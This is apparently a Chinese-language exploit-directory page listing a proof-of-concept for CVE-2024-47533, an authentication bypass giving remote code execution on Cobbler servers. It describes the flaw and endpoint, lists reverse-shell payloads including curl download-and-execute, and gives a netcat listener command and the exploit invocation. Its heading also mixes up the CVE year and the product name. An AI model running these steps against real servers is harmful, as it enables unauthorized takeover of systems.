Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-47533 — CVE-2025-47533 Clobber RCE的PoC | Kitploit
工具/GitHubGitHub/zs1n/cve-2024-47533
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubzs1n/cve-2024-47533

CVE-2024-47533

CVE-2025-47533 Clobber RCE的PoC

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-47533 - Cobbler XMLRPC 认证绕过远程代码执行漏洞利用

Cobbler 中通过认证绕过的严重远程代码执行漏洞

PoC 实现。


概述

Cobbler 是一个 Linux 安装服务器,能够快速设置网络安装环境,在 3.0.0 至 3.2.3(不含)和 3.3.7(不含)版本中存在一个认证漏洞。函数 utils.get_shared_secret() 始终返回 -1,允许任何人使用空用户名 ('') 和密码 -1 连接到 Cobbler XML-RPC 接口。这使得具有网络访问权限的攻击者能够完全控制 Cobbler 服务器。该漏洞已在 3.2.3 和 3.3.7 版本中修复。


🛠 技术分析

该漏洞是由于 utils.get_shared_secret() 函数对共享密钥处理不当所致,该函数始终返回 -1,从而有效绕过认证。这使得任何网络用户都可以使用空凭证连接到 Cobbler 的 XMLRPC 接口并执行任意命令。


🔥 漏洞端点

http://<target>:25151/ — Cobbler 的 XMLRPC API 端点


💥 示例载荷

该利用脚本支持多种反弹 shell 载荷,包括:

  • Bash 反弹 shell
  • Netcat shell (nc)
  • Curl 下载并执行

概念验证 (PoC)

准备监听器

在你的机器上启动一个 Netcat 监听器:

root@kitploit:~
nc -lvnp 4444

🚀 启动利用

运行利用脚本 CVE-2024-47533.py。

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

参数

-t : 目标 (示例:-t http://1<IP_SERVICE>:<PORT>)

-l: 本地 IP (示例:-l 10.10.11.80)

-p : 端口 <LOCAL_PORT> (示例:-p 4444)

--payload: 载荷 (bash, curl, nc) (示例:--payload bash)

💻 成功远程 Shell 访问

成功执行后,反弹 shell 将回连到监听器,授予攻击者远程访问服务器的权限。

下载工具